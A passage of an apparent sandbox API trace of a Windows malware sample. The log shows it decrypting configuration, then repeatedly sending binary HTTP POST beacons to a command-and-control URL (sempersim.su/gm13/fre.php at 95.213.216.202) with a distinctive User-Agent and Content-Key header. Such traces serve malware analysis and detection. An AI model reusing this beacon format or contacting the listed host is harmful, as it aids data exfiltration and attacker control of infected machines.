(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0277.498] GetProcessHeap () returned 0x620000 [0277.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642dc8 [0277.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0277.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.506] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0277.516] GetProcessHeap () returned 0x620000 [0277.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0277.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.517] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0277.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.518] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0277.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.519] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0277.519] GetProcessHeap () returned 0x620000 [0277.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0277.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.521] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642dc8, pdwDataLen=0x19fcfc | out: pbData=0x642dc8, pdwDataLen=0x19fcfc) returned 1 [0277.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.522] CryptDestroyKey (hKey=0x62d710) returned 1 [0277.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0277.523] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0277.523] GetProcessHeap () returned 0x620000 [0277.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644d90 [0277.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.524] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0277.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.525] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0277.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0277.544] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0277.544] GetProcessHeap () returned 0x620000 [0277.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0277.544] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0277.546] GetProcessHeap () returned 0x620000 [0277.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b500 [0277.547] socket (af=2, type=1, protocol=6) returned 0x414 [0277.547] connect (s=0x414, name=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0277.600] FreeAddrInfoW (pAddrInfo=0x63c348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0277.600] GetProcessHeap () returned 0x620000 [0277.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0277.600] GetProcessHeap () returned 0x620000 [0277.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0277.602] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0277.602] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0277.603] GetProcessHeap () returned 0x620000 [0277.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0277.603] GetProcessHeap () returned 0x620000 [0277.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0277.603] GetProcessHeap () returned 0x620000 [0277.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0277.603] GetProcessHeap () returned 0x620000 [0277.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0277.604] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0277.605] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0277.605] GetProcessHeap () returned 0x620000 [0277.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0277.605] GetProcessHeap () returned 0x620000 [0277.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0277.606] send (s=0x414, buf=0x63a880*, len=237, flags=0) returned 237 [0277.606] send (s=0x414, buf=0x6421e0*, len=159, flags=0) returned 159 [0277.606] GetProcessHeap () returned 0x620000 [0277.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0277.606] recv (in: s=0x414, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0279.447] GetProcessHeap () returned 0x620000 [0279.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0279.448] GetProcessHeap () returned 0x620000 [0279.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0279.448] GetProcessHeap () returned 0x620000 [0279.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0279.448] GetProcessHeap () returned 0x620000 [0279.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0279.448] closesocket (s=0x414) returned 0 [0279.449] GetProcessHeap () returned 0x620000 [0279.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b500 | out: hHeap=0x620000) returned 1 [0279.449] GetProcessHeap () returned 0x620000 [0279.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d90 | out: hHeap=0x620000) returned 1 [0279.449] GetProcessHeap () returned 0x620000 [0279.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0279.449] GetProcessHeap () returned 0x620000 [0279.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0279.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc44) returned 0x414 [0279.451] Sleep (dwMilliseconds=0xea60) [0279.463] GetProcessHeap () returned 0x620000 [0279.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0279.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.473] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0279.483] GetProcessHeap () returned 0x620000 [0279.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0279.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.484] CryptImportKey (in: hProv=0x63ba08, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0279.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.485] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.486] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.486] GetProcessHeap () returned 0x620000 [0279.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0279.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.487] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0279.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.488] CryptDestroyKey (hKey=0x62d710) returned 1 [0279.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.489] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0279.489] GetProcessHeap () returned 0x620000 [0279.489] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0279.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.490] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0279.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.491] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0279.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.492] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0279.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.493] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0279.493] GetProcessHeap () returned 0x620000 [0279.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0279.493] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0279.493] GetProcessHeap () returned 0x620000 [0279.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0279.494] GetProcessHeap () returned 0x620000 [0279.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0279.497] GetProcessHeap () returned 0x620000 [0279.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0279.498] GetProcessHeap () returned 0x620000 [0279.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ea0 [0279.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.499] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0279.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.506] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0279.515] GetProcessHeap () returned 0x620000 [0279.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0279.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.517] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0279.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.518] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0279.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.519] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0279.519] GetProcessHeap () returned 0x620000 [0279.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0279.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.520] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ea0, pdwDataLen=0x19fcfc | out: pbData=0x642ea0, pdwDataLen=0x19fcfc) returned 1 [0279.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.521] CryptDestroyKey (hKey=0x62d190) returned 1 [0279.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0279.522] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0279.522] GetProcessHeap () returned 0x620000 [0279.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0279.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.523] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0279.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.525] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0279.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0279.526] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0279.528] GetProcessHeap () returned 0x620000 [0279.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0279.528] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c4d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0279.530] GetProcessHeap () returned 0x620000 [0279.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0279.530] socket (af=2, type=1, protocol=6) returned 0x418 [0279.530] connect (s=0x418, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0279.582] FreeAddrInfoW (pAddrInfo=0x63c4d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0279.582] GetProcessHeap () returned 0x620000 [0279.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0279.583] GetProcessHeap () returned 0x620000 [0279.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0279.584] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0279.585] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0279.585] GetProcessHeap () returned 0x620000 [0279.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0279.585] GetProcessHeap () returned 0x620000 [0279.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0279.586] GetProcessHeap () returned 0x620000 [0279.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643638 [0279.586] GetProcessHeap () returned 0x620000 [0279.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0279.587] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0279.591] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0279.591] GetProcessHeap () returned 0x620000 [0279.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0279.591] GetProcessHeap () returned 0x620000 [0279.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0279.591] send (s=0x418, buf=0x63a880*, len=237, flags=0) returned 237 [0279.592] send (s=0x418, buf=0x6421e0*, len=159, flags=0) returned 159 [0279.592] GetProcessHeap () returned 0x620000 [0279.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0279.592] recv (in: s=0x418, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0281.399] GetProcessHeap () returned 0x620000 [0281.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0281.399] GetProcessHeap () returned 0x620000 [0281.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0281.400] GetProcessHeap () returned 0x620000 [0281.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0281.400] GetProcessHeap () returned 0x620000 [0281.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0281.401] closesocket (s=0x418) returned 0 [0281.402] GetProcessHeap () returned 0x620000 [0281.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0281.402] GetProcessHeap () returned 0x620000 [0281.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0281.402] GetProcessHeap () returned 0x620000 [0281.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0281.403] GetProcessHeap () returned 0x620000 [0281.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0281.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc48) returned 0x418 [0281.406] Sleep (dwMilliseconds=0xea60) [0281.417] GetProcessHeap () returned 0x620000 [0281.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6433f8 [0281.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0281.436] GetProcessHeap () returned 0x620000 [0281.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0281.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.437] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0281.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.438] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.438] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.438] GetProcessHeap () returned 0x620000 [0281.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0281.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.440] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6433f8, pdwDataLen=0x19fcfc | out: pbData=0x6433f8, pdwDataLen=0x19fcfc) returned 1 [0281.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.440] CryptDestroyKey (hKey=0x62d710) returned 1 [0281.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.441] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0281.441] GetProcessHeap () returned 0x620000 [0281.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646998 [0281.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.442] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0281.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.443] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0281.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.443] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0281.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.444] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0281.444] GetProcessHeap () returned 0x620000 [0281.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0281.444] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0281.445] GetProcessHeap () returned 0x620000 [0281.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0281.445] GetProcessHeap () returned 0x620000 [0281.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646998 | out: hHeap=0x620000) returned 1 [0281.445] GetProcessHeap () returned 0x620000 [0281.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0281.446] GetProcessHeap () returned 0x620000 [0281.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0281.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0281.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.454] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0281.459] GetProcessHeap () returned 0x620000 [0281.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0281.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.460] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0281.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.461] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0281.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.462] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0281.462] GetProcessHeap () returned 0x620000 [0281.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0281.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 